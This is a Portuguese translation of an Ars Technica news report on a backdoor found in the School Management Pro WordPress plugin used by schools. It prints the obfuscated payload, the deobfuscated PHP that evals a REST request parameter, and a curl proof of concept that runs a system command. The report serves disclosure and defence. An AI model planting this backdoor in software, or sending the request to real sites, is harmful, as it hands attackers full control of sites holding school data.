Pesquisadores encontram backdoor à espreita no plugin WordPress usado pelas escolas

Pesquisadores disseram na sexta-feira que encontraram um backdoor malicioso em um plugin do WordPress que deu aos invasores controle total dos sites que usaram o pacote, que é comercializado para escolas.

A versão premium do Gestão Escolarum plugin que as escolas usam para operar e gerenciar seus sites, contém o backdoor desde pelo menos a versão 8.9, disseram pesquisadores do serviço de segurança de sites JetPack em um relatório. postagem do blog sem descartar que estivesse presente em versões anteriores. Esta página de um site de terceiros mostra que a versão 8.9 foi lançada em agosto passado.

Backdoor óbvio

O Jetpack disse que descobriu o backdoor depois que membros da equipe de suporte do WordPress.com relataram ter encontrado códigos fortemente ofuscados em vários sites que usavam o School Management Pro. Depois de desobstruí-lo, eles perceberam que o código, escondido na parte de verificação de licença do plug-in, foi intencionalmente colocado lá com o objetivo de dar a pessoas de fora a capacidade de controlar os sites.

“O código em si não é tão interessante: é um backdoor óbvio injetado no código de verificação de licença do plugin”, disse o post do JetPack. “Ele permite que qualquer invasor execute código PHP arbitrário no site com o plug-in instalado.”

Em sua forma ofuscada, o código ficou assim:

}
$_fc = eval("x65x76x61x6c(x67x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "x6cx61x74" . "x65x28x62"."x61x73x65x36"."x34x5fx64x65x63x6fx64x65x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."x3b");
class WLSM_Crypt_Blowfish_DefaultKey

Após a desofuscação, o código ficou:

add_action( "rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Os pesquisadores escreveram uma exploração de prova de conceito que confirmou que o código ofuscado era de fato um backdoor que permitia que qualquer pessoa com conhecimento dele executasse o código de sua escolha em qualquer site que executasse o plug-in.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

O mistério permanece

Não está claro quantos sites usam o plugin. Weblizar, fabricante indiano do School Management, diz em sua página inicial que tem mais de 340 mil clientes para seus temas e plugins gratuitos e premium, mas o backdoor que o JetPack encontrou estava apenas no School Management Pro. O backdoor não estava na versão gratuita do plugin, e não há indicação de que tenha sido colocado em outros plugins que o Weblizar publica.

“Tentamos obter mais informações do fornecedor sobre quando o backdoor foi injetado, quais versões são afetadas e como o código acabou no plugin em primeiro lugar”, dizia o post. “Esse esforço não teve sucesso, pois o fornecedor diz que não sabe quando ou como o código entrou em seu software.”

As tentativas de chegar ao Weblizar não foram bem sucedidas.

Agora que a presença do backdoor é de conhecimento público, os invasores provavelmente o explorarão em qualquer site usando uma versão vulnerável do plug-in. Qualquer pessoa que use este plugin deve atualizar imediatamente. Mesmo após a correção, eles também devem verificar cuidadosamente o site em busca de sinais de comprometimento, pois a atualização não removerá nenhum novo backdoor que possa ter sido adicionado.


Source: Ars Technica by arstechnica.com.

*The article has been translated based on the content of Ars Technica by arstechnica.com. If there is any problem regarding the content, copyright, please leave a report below the article. We will try to process as quickly as possible to protect the rights of the author. Thank you very much!

*We just want readers to access information more quickly and easily with other multilingual content, instead of information only available in a certain language.

*We always respect the copyright of the content of the author and always include the original link of the source article.If the author disagrees, just leave the report below the article, the article will be edited or deleted at the request of the author. Thanks very much! Best regards!